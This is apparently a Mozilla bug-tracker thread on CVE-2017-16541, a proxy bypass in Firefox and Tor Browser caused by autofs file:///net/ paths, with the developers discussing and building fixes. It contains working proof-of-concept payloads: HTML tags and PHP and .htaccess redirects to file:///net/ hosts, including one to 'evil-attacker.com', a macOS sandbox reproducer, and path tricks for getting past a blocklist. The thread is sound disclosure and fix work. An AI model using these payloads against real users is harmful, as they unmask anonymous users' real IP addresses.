Closed Bug 1412081 Opened 2 years ago Closed Last year

(CVE-2017-16541) Proxy bypass caused by autofs on Mac, Linux

Categories

(Core :: Networking: File, defect, P2)

defect

Tracking

()

RESOLVED FIXED
mozilla63
Tracking Status
firefox-esr52 - wontfix
firefox-esr60 62+ fixed
firefox56 --- wontfix
firefox57 + wontfix
firefox58 + wontfix
firefox59 + wontfix
firefox60 - wontfix
firefox61 --- wontfix
firefox62 --- fixed
firefox63 --- fixed

People

(Reporter: arthur, Assigned: valentin, NeedInfo)

References

()

Details

(Keywords: csectype-disclosure, privacy, sec-moderate, Whiteboard: [tor 24052][sec-critical for Tor][necko-triaged][post-critsmash-triage][adv-main62+][adv-esr60.2+])

Attachments

(6 files, 6 obsolete files)

1.90 KB, patch
Details | Diff | Splinter Review
27.55 KB, patch
Details | Diff | Splinter Review
1.27 KB, patch
jimm
: review+
Details | Diff | Splinter Review
27.56 KB, patch
Details | Diff | Splinter Review
29.73 KB, patch
Details | Diff | Splinter Review
963 bytes, patch
Details | Diff | Splinter Review
Tor Project received a third-party report of a method for content pages to bypass the proxy. STR:

Create a web page with the following:
<head>
<link href='file:///net/12.12.12.12/a.css' rel='stylesheet'>
</head>

Run a "tcpdump port 111" on 12.12.12.12. UDP events are observed that did not pass through the browser proxy.

(A demo is at https://pearlcrescent.com/tor/am.html)

I also observed the same thing for <img> tags. This behavior apparently is caused by automount/autofs, which is enabled by default on macOS and installable on Linux.

More information from a colleague:

My quick test on OSX 10.12.x shows that Chrome and Safari (latest versions) are not affected.

It is also interesting that I see the following message in the browser console after the page load completes (i.e., after it gives up on the automounted file):

Security Error: Content at https://pearlcrescent.com/tor/am.html may not load or link to file:///net/192.168.1.43/a.css.

Access is blocked (i.e., the CSS does not load, the image does not load), but only after an attempt has been made to open the file (or maybe just traverse its path.
Ouch, I was able to reproduce. There seems to me to be three things going on here:

a) Why are we loading pages that will generate security errors?

b) Is an HTTP page triggering opening a file content process? If so, I think that's a bug, as those will requests will always generate security errors. (I originally thought it was, but now that I see (c) it's possible this is all happening in the sandboxed process)

c) A kernel bug on macOS that sandboxed processes are able to trigger automount, minimal reproducer:

sandbox-exec -p '(version 1) (deny default) (allow process-exec* (path "/usr/bin/stat")) (allow file-read* (subpath "/usr") (subpath "/System") (subpath "/private/var/db/dyld"))' /usr/bin/stat /net/12.12.12.12/a.css

I can see that triggering things in the TCP dump.
Arthur, do you or the original reporter want to report (c) to Apple, or shall I?
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #2)
> Arthur, do you or the original reporter want to report (c) to Apple, or
> shall I?

Feel free to do so.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #1)
> Ouch, I was able to reproduce. There seems to me to be three things going on
> here:
> 
> a) Why are we loading pages that will generate security errors?

For the stylesheet case at least, it seems like the security check is done after the stylesheet loader channel is created. That is probably okay for http: URLs (since creating the channel does not cause any network activity to occur in that case). But tracing through the code path underneath Loader::LoadSheet(), network activity occurs in the file:///net/...  case inside the nsFileChannel constructor. Specifically, the call to IsSymlink() hits the network, which is not too surprising since it must call stat() or lstat().

I am not familiar with all of this code, but somehow the security check needs to be done earlier.
That analysis sounds correct to me -- a stat is enough to trigger this. ni?Cristoph who I expect knows this code well.
Flags: needinfo?(ckerschb)
The "can web pages load file urls?" is done as part of the usual security checks (CheckMayLoad, CheckLoadURI, content policies like mixed-content blocker and CSP), and given the eventual error message these are still happening. We've found a number of things recently that send extra loads that bypass those. In particular I wonder if this is some kind of preload/prefetch/preconnect speculative load from the parser that bypasses content checks on the incorrect theory "it's OK as long as we check before they end up in the document".

There are multiple prefs that turn off various preloads. Might not take too much time to diagnose whether those are involved or not.

Some of those are
  network.http.speculative-parallel-limit   (set to 0, though it should only be for http)
  network.dns.disablePrefetch               (again, file: isn't expected to need dns)

and others that appear to be turned off already, but maybe I missed one that's relevant for file: loads.
Group: core-security → network-core-security
Has STR: --- → yes
Whiteboard: [tor] → [tor][sec-high for Tor?]
Whiteboard: [tor][sec-high for Tor?] → [tor][sec-critical for Tor]
Adding a check to CheckMayLoad, CheckLoadURI, and/or possibly CheckLoadURIWithPrincial prior to constructing the nsIChannel by calling NS_NewChannelWithTriggeringPrincipal in Loader::LoadSheet would likely solve this issue for attempting to load file: URIs as stylesheets, but would not solve it universally, if it exists elsewhere.

Another option is to bypass the stat checking when file uris are autofs uris on MacOS and Linux, so file:///net/*. This would fix the problem for all instances with a file uri at a possible risk of symlink confusion breaking SOP (see bug 782581). Since that case dealt with other Android processes gaining access to sensitive content such as password and cookie databases, this may be safe to break in this one case.
(In reply to Kate McKinley [:kmckinley, :Kate] from comment #7)
> Adding a check to CheckMayLoad, CheckLoadURI, and/or possibly
> CheckLoadURIWithPrincial prior to constructing the nsIChannel by calling
> NS_NewChannelWithTriggeringPrincipal in Loader::LoadSheet would likely solve
> this issue for attempting to load file: URIs as stylesheets, but would not
> solve it universally, if it exists elsewhere.

I think that seems a bit brittle to me. Arthur reproduced the issue with <img> tags as well.
 
> Another option is to bypass the stat checking when file uris are autofs uris
> on MacOS and Linux, so file:///net/*. This would fix the problem for all
> instances with a file uri at a possible risk of symlink confusion breaking
> SOP (see bug 782581). Since that case dealt with other Android processes
> gaining access to sensitive content such as password and cookie databases,
> this may be safe to break in this one case.

This sounds like the more promising approach to me right now.
Okay, I tried to verify whether Linux is actually affected by this and, surprisingly, I failed so far. Here is what I did on a Debian testing machine and an Ubuntu 14.04:

1) Installed the autofs package
2) Uncommented the /net -hosts line in /etc/auto.master
3) Restarted the machine
4) Captured traffic with tcpdump/wireshark going to a website with the PoC.
5) No non-Tor traffic showed up.

I did this both in Tor Browser and vanilla Firefox (pointed to a local Tor) with different settings.

Does anybody have different steps that show Linux is affected, too?
(In reply to Mark Smith (:mcs) from comment #4)
> For the stylesheet case at least, it seems like the security check is done
> after the stylesheet loader channel is created.

That is the case for all of our security checks in fact. We create a channel and once we call open2() or also asyncOpen2() on the channel we perform the required security checks, because nothing should have hit the network until this point. Apparently you found a case where that's different. So your evaluation of the situation is accurate.

Since we already have the loadInfo available on the nsFileChannel we could use that information to figure out who triggered the load. I would imagine that the web never needs access to a local file and that any kind of upload scenarios (one would have to verify) are triggered by the SystemPrincipal. I hope that is the case, which would make sense. If all that is true then we could have a very hacky way of blocking. A very raw strawman patch could look like this:

--- a/netwerk/protocol/file/nsFileChannel.cpp
+++ b/netwerk/protocol/file/nsFileChannel.cpp
@@ -278,16 +278,24 @@ nsFileChannel::Init()
 #ifdef XP_WIN
   nsAutoString fileTarget;
 #else
   nsAutoCString fileTarget;
 #endif
   nsCOMPtr<nsIFile> resolvedFile;
   bool symLink;
   nsCOMPtr<nsIFileURL> fileURL = do_QueryInterface(mFileURI);
+
+  if (mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()) {
+    // potentially we could even check for http/https if necessary
+    // I am not entirely sure if we create codebasePrincipal for something
+    // other than web these days.
+    return error;
+  }

Obviously we could also do some kind of string matching to figure out the file:///net case, but I am not sure if there are other ways to bypass that string matching.
Flags: needinfo?(ckerschb)
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #10)
> (In reply to Mark Smith (:mcs) from comment #4)
> > For the stylesheet case at least, it seems like the security check is done
> > after the stylesheet loader channel is created.
> 
> That is the case for all of our security checks in fact. We create a channel
> and once we call open2() or also asyncOpen2() on the channel we perform the
> required security checks, because nothing should have hit the network until
> this point. Apparently you found a case where that's different. So your
> evaluation of the situation is accurate.
> 
> Since we already have the loadInfo available on the nsFileChannel we could
> use that information to figure out who triggered the load. I would imagine
> that the web never needs access to a local file and that any kind of upload
> scenarios (one would have to verify) are triggered by the SystemPrincipal. I
> hope that is the case, which would make sense. If all that is true then we
> could have a very hacky way of blocking. A very raw strawman patch could
> look like this:
> 
> --- a/netwerk/protocol/file/nsFileChannel.cpp
> +++ b/netwerk/protocol/file/nsFileChannel.cpp
> @@ -278,16 +278,24 @@ nsFileChannel::Init()
>  #ifdef XP_WIN
>    nsAutoString fileTarget;
>  #else
>    nsAutoCString fileTarget;
>  #endif
>    nsCOMPtr<nsIFile> resolvedFile;
>    bool symLink;
>    nsCOMPtr<nsIFileURL> fileURL = do_QueryInterface(mFileURI);
> +
> +  if (mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()) {
> +    // potentially we could even check for http/https if necessary
> +    // I am not entirely sure if we create codebasePrincipal for something
> +    // other than web these days.
> +    return error;
> +  }

This looks promising. However, I am not exactly sure that we have all the necessary things ready at this point looking at ESR 52 code. It seems to me bug 1319111 added all the changes you build upon. And backporting that one + all the dependent bugs seems unrealistic. Am I missing something (and if not what options do we have instead)?
 
> Obviously we could also do some kind of string matching to figure out the
> file:///net case, but I am not sure if there are other ways to bypass that
> string matching.

True. I'd rather avoid that if possible.
Flags: needinfo?(ckerschb)
Adding Filippo Cavallarin, the original bug reporter, to this bug.
(In reply to Georg Koppen from comment #9)
> Okay, I tried to verify whether Linux is actually affected by this and,
> surprisingly, I failed so far. Here is what I did on a Debian testing
> machine and an Ubuntu 14.04:

I was able to reproduce the problem on Debian Jessie.

> 
> 1) Installed the autofs package
> 2) Uncommented the /net -hosts line in /etc/auto.master
> 3) Restarted the machine
> 4) Captured traffic with tcpdump/wireshark going to a website with the PoC.
> 5) No non-Tor traffic showed up.

I did the same steps and I saw UDP traffic to the IP from the file:// path, on port 28416 (but not on port 111). However it only happens once, probably because the error is cached, so if I want to try it again I need to change the IP in the path.
(In reply to Georg Koppen from comment #11)
> This looks promising. However, I am not exactly sure that we have all the
> necessary things ready at this point looking at ESR 52 code. It seems to me
> bug 1319111 added all the changes you build upon. And backporting that one +
> all the dependent bugs seems unrealistic. Am I missing something (and if not
> what options do we have instead)?

I am adding Honza since he fixed Bug 1319111. Anyway, we added the triggeringPrincipal to the loadInfo within Bug 1083422 [1], which landed for FF35. In other words triggeringPrincipal information on the loadinfo for subrequest loads should definitely be accurate for ESR52. I don't fully understand why the final channel URL is important to fix the problem in this bug. As I understand it, if mFileURI [2] would point to e.g. file:///net then we would hit the network at the time we call ::init on nsFileChannel, right? So I don't think Bug 1319111 is relevant in any way for fixing this bug. But maybe I am missing something here.

[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1083422
[2] https://dxr.mozilla.org/mozilla-central/source/netwerk/protocol/file/nsFileChannel.cpp#285
Flags: needinfo?(ckerschb)
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #14)
> (In reply to Georg Koppen from comment #11)
> > This looks promising. However, I am not exactly sure that we have all the
> > necessary things ready at this point looking at ESR 52 code. It seems to me
> > bug 1319111 added all the changes you build upon. And backporting that one +
> > all the dependent bugs seems unrealistic. Am I missing something (and if not
> > what options do we have instead)?
> 
> I am adding Honza since he fixed Bug 1319111. Anyway, we added the
> triggeringPrincipal to the loadInfo within Bug 1083422 [1], which landed for
> FF35. In other words triggeringPrincipal information on the loadinfo for
> subrequest loads should definitely be accurate for ESR52. I don't fully
> understand why the final channel URL is important to fix the problem in this
> bug. As I understand it, if mFileURI [2] would point to e.g. file:///net
> then we would hit the network at the time we call ::init on nsFileChannel,
> right? So I don't think Bug 1319111 is relevant in any way for fixing this
> bug. But maybe I am missing something here.

Thanks. You probably don't. I was just wondering how to get the proper loadInfo in the constructor and how to abort properly before we hit the UDP leak.
(In reply to Georg Koppen from comment #15)
> Thanks. You probably don't. I was just wondering how to get the proper
> loadInfo in the constructor and how to abort properly before we hit the UDP
> leak.

You can simply access the member mLoadInfo (which is the current loadinfo of the file channel). To abort the load I assume you can just return any NS_ERROR_*. (Maybe NS_ERROR_FILE_TARGET_DOES_NOT_EXIST). I looked at other code within the ::init() function and it seems simply returning an error is all there is to do (once we exactly know what condition for aborting is).
(In reply to Christoph Kerschbaumer [:ckerschb] from comment #16)
> (In reply to Georg Koppen from comment #15)
> > Thanks. You probably don't. I was just wondering how to get the proper
> > loadInfo in the constructor and how to abort properly before we hit the UDP
> > leak.
> 
> You can simply access the member mLoadInfo (which is the current loadinfo of
> the file channel). To abort the load I assume you can just return any
> NS_ERROR_*. (Maybe NS_ERROR_FILE_TARGET_DOES_NOT_EXIST). I looked at other
> code within the ::init() function and it seems simply returning an error is
> all there is to do (once we exactly know what condition for aborting is).

Returning an error does not work as the compiler is complaining about doing so in a constructor. And just accessing `mLoadInfo` and doing things like you did in comment:10 (i.e. `mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()`) does not work as `mLoadInfo` is `null` it seems (if I am doing a `if (mLoadInfo)` the code in the if-clause is never executed). So, what did you have in mind (sorry if I am not following)?
Flags: needinfo?(ckerschb)
I am not sure, but it might work to add the check suggested by Christoph to nsFileProtocolHandler::NewChannel2().
(In reply to Georg Koppen from comment #17)
> Returning an error does not work as the compiler is complaining about doing
> so in a constructor. And just accessing `mLoadInfo` and doing things like
> you did in comment:10 (i.e.
> `mLoadInfo->TriggeringPrincipal()->GetIsCodebasePrincipal()`) does not work
> as `mLoadInfo` is `null` it seems (if I am doing a `if (mLoadInfo)` the code
> in the if-clause is never executed). So, what did you have in mind (sorry if
> I am not following)?

Well, this is what I had in mind actually. The loadInfo should not be null at this point. Can we figure out why it is null? As Mark suggested, first we could check that we get the required arguments within newChannel2(). But Maybe newChannel2 is not even called and the channel is created somehow different. Further down within the ::init() method, mLoadinfo is even accessed at the moment, so I am surprised it's null.

Regarding returning the error within the ::init() method, that should work, because there is already code that does the same. Or are you really trying to do it in the constructor and not the ::init() method?
Flags: needinfo?(ckerschb)
::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies that mLoadInfo is not nullptr.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #20)
> ::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies
> that mLoadInfo is not nullptr.

I agree but we need ESR 52 code for Tor Browser and there is no such thing in nsFileChannel.cpp.[1] I tried to work with Christoph's code there which gave me the results I mentioned in comment:17 and made me wonder in comment:15.

[1] https://dxr.mozilla.org/mozilla-esr52/source/netwerk/protocol/file/nsFileChannel.cpp#253
Ah, sorry, I missed the fact that we were talking about different versions.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #20)
> ::Init starts with NS_ENSURE_STATE(mLoadInfo);, which looks like it verifies
> that mLoadInfo is not nullptr.

Bug 1319111 rearranged things like this:


instead of...


channel = new nsFileChannen(url) {
  // the code we want to patch
}
channel->SetLoadInfo()


...it does...


channel = new nsFileChannel(url) : mURL(url) {}
channel->SetLoadInfo(loadinfo)
channel->Init() {
  // the code we want to patch
}


you don't need to bother with the new resultPrincipalURI (not on esr52).



Regarding the codebase principal check, you should ask Boris, but I think we only use codebase principal for thing we are about to load from unknown (and potentially unsafe) uris, but we may also use codebase principal for moz-extenstion (privileged, I think).

as I understand, we later block the load in CSP.  what exactly is the check doing?  could we move whole check or the part of it that detects the load blocking here?  to be on the safe side...
FWIW: I tested Christoph's patch in comment:10 in a Firefox 56 build and it solves the bug for me on Linux. I guess having a similar option for ESR 52 would be neat...
(In reply to Mark Smith (:mcs) from comment #18)
> I am not sure, but it might work to add the check suggested by Christoph to
> nsFileProtocolHandler::NewChannel2().

Partly, yes. The problems is that we hit the newChannel() call in `nsIOService::NewChannelFromURIWithProxyFlagsInternal()` without loadFlags. I guess what we can do is do just return an error in our case if we hit that part. I've implemented that in a patch and I don't see the proxy bypass on my Linux box anymore. mcs/arthur: could you verify that on OS X as well (see the attached patch; I could not give its final version a test yet as I blew my build away accidentally and need to make a full new one but am about to be afk)? Is there anything we'd blow up by deploying this workaround?
Flags: needinfo?(arthuredelstein)
(In reply to Georg Koppen from comment #25)
> see the attached patch

I don't think you attached anything
Flags: needinfo?(gk)
Here comes the mentioned patch.
Flags: needinfo?(gk)
(In reply to Tom Ritter [:tjr] from comment #26)
> (In reply to Georg Koppen from comment #25)
> > see the attached patch
> 
> I don't think you attached anything

Yeah, my browser crash while uploading, sorry.
Flags: needinfo?(mcs)
Dan, would it be okay if we released a new Tor Browser with a functional workaround before this bugs gets fixed properly by being as unspecific as possible in our announcement and just including the code without any comments etc.? This is a critical issue for us.
Flags: needinfo?(dveditz)
(In reply to Georg Koppen from comment #25)
> (In reply to Mark Smith (:mcs) from comment #18)
> > I am not sure, but it might work to add the check suggested by Christoph to
> > nsFileProtocolHandler::NewChannel2().
> 
> Partly, yes. The problems is that we hit the newChannel() call in
> `nsIOService::NewChannelFromURIWithProxyFlagsInternal()` without loadFlags.
> I guess what we can do is do just return an error in our case if we hit that
> part. I've implemented that in a patch and I don't see the proxy bypass on
> my Linux box anymore. mcs/arthur: could you verify that on OS X as well (see
> the attached patch; I could not give its final version a test yet as I blew
> my build away accidentally and need to make a full new one but am about to
> be afk)? Is there anything we'd blow up by deploying this workaround?

I built Tor Browser alpha (based on ESR52) without and with the patch (23447a7a1b0), for OS X, and tested it as before. I can confirm that the patch stops the proxy bypass for both the CSS and <image> cases. I have also browsed to several sites with the patched version and didn't run into any problems.

Here are my branches:
https://github.com/arthuredelstein/tor-browser-build/commit/1412081
https://github.com/arthuredelstein/tor-browser/commit/1412081

Here are my builds in case anyone wants to try it:
https://arthuredelstein.net/stuff/1412081

And I applied the patch to the latest Firefox ESR52 and pushed to try. We'll see how it goes:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=6c475d223e9433df14c2728e7e1641b659b698be
Flags: needinfo?(arthuredelstein)
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #30)

> And I applied the patch to the latest Firefox ESR52 and pushed to try. We'll
> see how it goes:
> https://treeherder.mozilla.org/#/
> jobs?repo=try&revision=6c475d223e9433df14c2728e7e1641b659b698be

A lot of test failures turned up, so I am running the negative control (same branch minus the patch) to see which failures we can attribute to the patch:

https://treeherder.mozilla.org/#/jobs?repo=try&revision=feaa5cdb3ccb
(In reply to Georg Koppen from comment #29)
> Dan, would it be okay if we released a new Tor Browser with a functional
> workaround before this bugs gets fixed properly

Please do!
Flags: needinfo?(dveditz)
Okay, we were about to release Tor Browser 7.0.9 with the attached workaround today but Filippo and Nicolas found ways to bypass it. So we stopped.

I don't have a URL handy to test for those new attack vectors but they seem to involve redirect mechanisms. Just pointing a victim to a php file containing:

<?php
header("Location: file:///net/evil-attacker.com/a.css");
?>

is supposed to be enough or creating an .htaccess file with the line

Redirect / file:///net/11.11.11.14/a.css
Flags: needinfo?(mcs)
The problem seems to be that the codebase principal check is failing in the redirect case. Christoph: Do we have a different check we could use for both redirect/non-redirect cases? Just using the triggering principal one and preventing channel creation in that case already seems to be the nuclear option as it makes file:// unusable.
Flags: needinfo?(ckerschb)
Honza: Or maybe we could/should do something else for the redirect case?
Flags: needinfo?(honzab.moz)
I made a patch that blocks redirects from http(s) to file:// URIs. I'm not sure if it's the ideal approach, but I think it might be a reasonable stopgap for Tor Browser:
https://github.com/arthuredelstein/tor-browser/commit/1412081_redirect

Here's the build:
https://arthuredelstein.net/stuff/1412081/TorBrowser-7.5a6-osx64_en-US_redirect_patch.dmg
https://arthuredelstein.net/stuff/1412081/TorBrowser-7.5a6-osx64_en-US_redirect_patch.dmg.asc

(Note this doesn't include Georg's other patch. Both patches will be needed to block everything.)
Flags: needinfo?(honzab.moz)
Dan, under what circumstances do we want to allow an http redirect to a file? I can't think of any off the top of my head (and didn't think we ever allowed it.. but apparently that's not true.). We can certainly block it right in the http channel code if there isn't some use case to support..
A simple test showed that we as expected block http->file redirects.  For a quick fix we could add the simple schema check as suggested in comment 36 to prevent creation of the file channel.

I can't think of a general check from the top of my head to do checkmayload checks prior we do stat() on the file.
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #36)
> I made a patch that blocks redirects from http(s) to file:// URIs. I'm not
> sure if it's the ideal approach, but I think it might be a reasonable
> stopgap for Tor Browser:
> https://github.com/arthuredelstein/tor-browser/commit/1412081_redirect

I confirm this patch is fixing the redirect to file:// issue in a Linux build for me:
https://people.torproject.org/~boklm/p/1412081_redirect/tor-browser-linux64-7.5a7_en-US.tar.xz
https://people.torproject.org/~boklm/p/1412081_redirect/tor-browser-linux64-7.5a7_en-US.tar.xz.asc
At first I had trouble reproducing the HTTP redirect problem. For some reason the problem does occur reliably in the first/default tab in Tor Browser 7.0.x but I can always reproduce it in a new tab. Now I can confirm that the patch from comment #36 closes the HTTP redirect hole on macOS.

I wonder if there are other similar holes that need to be closed. Script-based techniques such as setting document.location seem to be caught early by existing code that calls ssm->CheckLoadURIFromScript(). I tried using a file:///net/... URL as the src for an <iframe> but that is also blocked early by existing code. I don't think FTP supports redirect to an arbitrary URL. Can anyone think of other protocols or techniques within HTTP or HTML that we should examine? I don't know what netwerk/protocol/gio does but at least that is not included in ESR52 (so it is not an immediate concern for Tor Browser).
(In reply to Mark Smith (:mcs) from comment #40)
> At first I had trouble reproducing the HTTP redirect problem. For some
> reason the problem does occur reliably in the first/default tab in Tor
> Browser 7.0.x ....

I meant to say "For some reason the problem does NOT occur reliably..." Sorry!
A couple of much weaker attacks I noticed:
1. The user could be induced to past file:///net/11.11.11.14/a.css into the URL bar
2. Open an html page with <img src="file:///net/11.11.11.14/a.jpg">. Now choose Page Info, click on the item for the fake image, click "Save As" and choose a location to save the file.

#1 is perhaps a concern. For #1 the most promising fix I can think of is to blacklist URLs of the form "file:///net/*".

#2 seems unlikely to be a very useful attack vector, but perhaps it would be good to fix as well.
(In reply to Arthur Edelstein (Tor Browser dev) [:arthuredelstein] from comment #42)
> A couple of much weaker attacks I noticed:
> 1. The user could be induced to past file:///net/11.11.11.14/a.css into the
> URL bar
> 2. Open an html page with <img src="file:///net/11.11.11.14/a.jpg">. Now
> choose Page Info, click on the item for the fake image, click "Save As" and
> choose a location to save the file.
> 
> #1 is perhaps a concern. For #1 the most promising fix I can think of is to
> blacklist URLs of the form "file:///net/*".
> 
> #2 seems unlikely to be a very useful attack vector, but perhaps it would be
> good to fix as well.

Thanks for those points. Yes, those are scenarios the final patch has to address, I agree. Especially #1. I think, though, we could release an update without addressing them (I am building right now a new Tor Browser including your redirect patch as well *fingers crossed*).
> I would imagine that the web never needs access to a local file

You would imagine wrong.  See http://searchfox.org/mozilla-central/rev/aa1343961fca52e8c7dab16788530da31aab7c8d/caps/nsIScriptSecurityManager.idl#129-134 for example.

> Dan, under what circumstances do we want to allow an http redirect to a file?

Again, see our explicit support for allowing some sites, controlled by prefs, to link to file:// URIs.

For the real underlying issue here, the basic problem is that file:// is so messed up, between symlinks, virtual filesystems, etc.  Some specific issues with them:

1)  Some of our security checks (e.g. CheckMayLoad) _require_ that symlinks be resolved 
    before a check is done, due to the fact that we treat files in the same dir as same-origin
    but symlinks can cross directory boundaries.  This obviously requires a stat().
2)  CheckMayLoad also needs to stat() files because it needs to treat file:///foo and file:///FOO
    as same-origin on case-insensitive filesystems.
3)  For this bug, it sounds like CheckLoadURI needs to happen _before_ we ever stat() the file.

This list is clearly not exhaustive.

To fix issues around symlinks, we resolve symlinks (and hence stat() the file) immediately in nsFileChannel::Init.  I urge everyone to read through bug 670514 to see why doing it fully lazily (and not caching the stat() results) does not work.  That said, we could consider doing it as part of the AsyncOpen security-check process, instead of Init(), and make sure that it happens after the CheckLoadURI call.  I _think_ that should avoid regressing the issues from bug 670514 while allowing us to fix this bug.

I should note that until we moved CheckLoadURI into the channel code, this was slightly less of an issue, because we did not create the channel until _after_ CheckLoadURI passed.  I don't know whether CheckLoadURI still involved a stat() at that point or not.  We would need to check whether it does one.

We definitely need to ensure that we do not ever _read_ the file (including for "symlink resolution" or Windows equivalent) until after CheckLoadURI passes in the cases in which reading the file is already a failure (various /dev/tty bits on Linux, Windows special files that hang or crash the process when read, etc).

> 1. The user could be induced to past file:///net/11.11.11.14/a.css into the URL bar

True.  The user could also be induced to paste "touch /net/11.11.11.14/a.css" into their terminal... I think fundamentally having autofs enabled is pretty prejudicial to fully controlling your network access.  :(

> Now choose Page Info, click on the item for the fake image, click "Save As" and choose a location to save the file.

Right, there's a fundamental tension here between "the page is not allowed to link there" and "the user wants to get the data"...  It's worth looking at the history of whether page info ever enforced CheckLoadURI checks on the "Save As" functionality in its media tab and thinking about whether it should.
(In reply to Patrick McManus [:mcmanus] from comment #37)
> Dan, under what circumstances do we want to allow an http redirect to a
> file? I can't think of any off the top of my head (and didn't think we ever
> allowed it.. but apparently that's not true.). We can certainly block it
> right in the http channel code if there isn't some use case to support..

Something interesting I observed is, without the patch in comment 36, some UDP events are detected at the target server, but that is followed by a Security Error appearing in the web console claiming the redirect is not permitted. So it appears that the intention was already to cancel (most) redirects from http to file:///, but the cancellation happens too late to prevent some network leakage. So, in the final patch, the existing code that prevents redirects to file:/// and takes into account certain prefs as mentioned by Boris, perhaps needs to be refactored to a new location such that cancellation happens earlier.
(In reply to Georg Koppen from comment #34)
> The problem seems to be that the codebase principal check is failing in the
> redirect case. Christoph: Do we have a different check we could use for both
> redirect/non-redirect cases? Just using the triggering principal one and
> preventing channel creation in that case already seems to be the nuclear
> option as it makes file:// unusable.

I think Boris added a bunch of very valuable information within comment 44. Probably it's best we don't do stat() within ::init() but instead rather move it to asyncOpen2. Or more precisely to the contentSecurityManager right after we preform the CheckLoadURI check.
Flags: needinfo?(ckerschb)
Tracking this for 57. It's late in the release cycle but we could still uplift for the RC build(s).
Apple requests that we not mention the sandbox-bypass with /net when this is resolved.
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #48)
> Apple requests that we not mention the sandbox-bypass with /net when this is
> resolved.

Which reminds me: shouldn't such a thing get caught by the Linux sandbox as well (ideally)?
I would have expected it to, add :gcp to see what the deal is there.
Flags: needinfo?(gpascutto)
Flags: needinfo?(gpascutto)
From conversation, the Linux sandbox "catches" and blocks that stat() from content, but resolving what is actually being stat() to see if it's allowed leads to the information leak happening on the chrome side. Content will be told the path is not allowed but of course by then the damage is done.

It's reasonable suspect the macOS kernel bug works along similar lines.
Summary: Proxy bypass caused by autofs on Mac, Linux → (CVE-2017-16541) Proxy bypass caused by autofs on Mac, Linux
Priority: -- → P2
Whiteboard: [tor][sec-critical for Tor] → [tor][sec-critical for Tor][necko-triaged]
See Also: → 1413868
Are there strong voices against disabling file: URI loading *completely* via a preference that the Tor browser could set?  It would be a solution for similar bug 1413868 too.
Do we have UI resources that load from file:// URIs?

If we only want to disable it from web pages, seems like an extension could easily do that...
(In reply to Boris Zbarsky [:bz] (no decent commit message means r-) from comment #53)
> Do we have UI resources that load from file:// URIs?
> 
> If we only want to disable it from web pages, seems like an extension could
> easily do that...

We can substitute internally to file:// (moz-ext:, resource:, jar:?), so general disabling is not possible, right.  

We want to disable only: top level loads (typing in address bar, command line, link clicks), iframes, subresources, general redirects-to, something else?

The distinction could be system principal, but I'm not sure if there can be a case of a system-principal load that is user/content-controlled and not application-controlled.
Apple have notified me that they believe this is fixed in the macOS 10.13.3 beta -- once that's released (they didn't provide a date) we can disclose the bypass mechanism if we like.
Whiteboard: [tor][sec-critical for Tor][necko-triaged] → [tor 24052][sec-critical for Tor][necko-triaged]
This is fixed in today's macOS 10.13.3 release.
Assignee: nobody → arthuredelstein
Priority: P2 → P1
Now that this is resolved in macOS, I'd like to go about upstreaming to Firefox the improvements tor landed to refuse to access file:// resources earlier.

Arthur, is that something on your roadmap, or would it be helpful if I took that on? And if the latter, do you have a link to the patches that tor is currently applying for this?
Flags: needinfo?(arthuredelstein)
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #57)
> Now that this is resolved in macOS, I'd like to go about upstreaming to
> Firefox the improvements tor landed to refuse to access file:// resources
> earlier.
> 
> Arthur, is that something on your roadmap, or would it be helpful if I took
> that on? And if the latter, do you have a link to the patches that tor is
> currently applying for this?

If you could work on this, please do. The patches are here:

https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=4fbe4216456298af5c68198b3ff0f552f9bb8464
https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=a7ddff8279b931f42cccc538fc1cdd6a51c23795
https://gitweb.torproject.org/tor-browser.git/commit/?h=tor-browser-52.6.0esr-8.0-2&id=ab28cdb28b2e974129d141e4150f1486404cb254

Now, those were just hacks (and a follow-up bugfix) we deployed to close the critical hole as fast as possible and they are breaking some file:// usage scenarios. I am not sure Mozilla would want those. If so, fine with us. But if you or anyone else could use this opportunity to have a real fix ready for ESR 60 that would be great!
Flags: needinfo?(arthuredelstein)
Too late in the 59 cycle at this point.
This seems stalled.  Alex, do you still want to look at this?
I was planning on it, but haven't had the cycles to. With Apple's kernel fix the priority is slightly lower since it's non-exploitable on patched macOS.
Flags: needinfo?(agaynor)
(In reply to Alex Gaynor [:Alex_Gaynor] from comment #61)
> I was planning on it, but haven't had the cycles to. With Apple's kernel fix
> the priority is slightly lower since it's non-exploitable on patched macOS.

Only for our use case. It's still a proxy bypass, so Tor is carrying an incomplete fix for this that (I think) breaks some functionality like Save t file or something similar. They're going to wind up backporting whatever we come up with to 60; so it would be good to avoid a confusing rebase for them...
Assignee: arthuredelstein → nobody
Priority: P1 → P2
Assignee: nobody → valentin.gosu
We are currently preparing Tor Browser based on ESR 60 and it turns out that a (critical) part of our workaround is broken now. Valentin: what's your planned timeframe for looking into this bug?
Flags: needinfo?(valentin.gosu)
I have a WIP patch based on bug 1413868 that seems to work in blocking file access to paths based on a pref blacklist.
I will post it for review shortly, hopefully with some tests :)
Flags: needinfo?(valentin.gosu)
Attached patch WIP-patch-and-gtest (obsolete) — Splinter Review
This WIP patch goes on top of attachment 8972049 [details] [diff] [review]. In the gtest I wrote a few ways I found to bypass the filter (which I then fixed), but there are a few others I didn't get to yet.
A few examples of paths that could be used to bypass the filter:
/./net/IP
/../../net/IP
/other/../net/IP
///net/IP
Comment on attachment 8979286 [details] [diff] [review]
WIP-patch-and-gtest

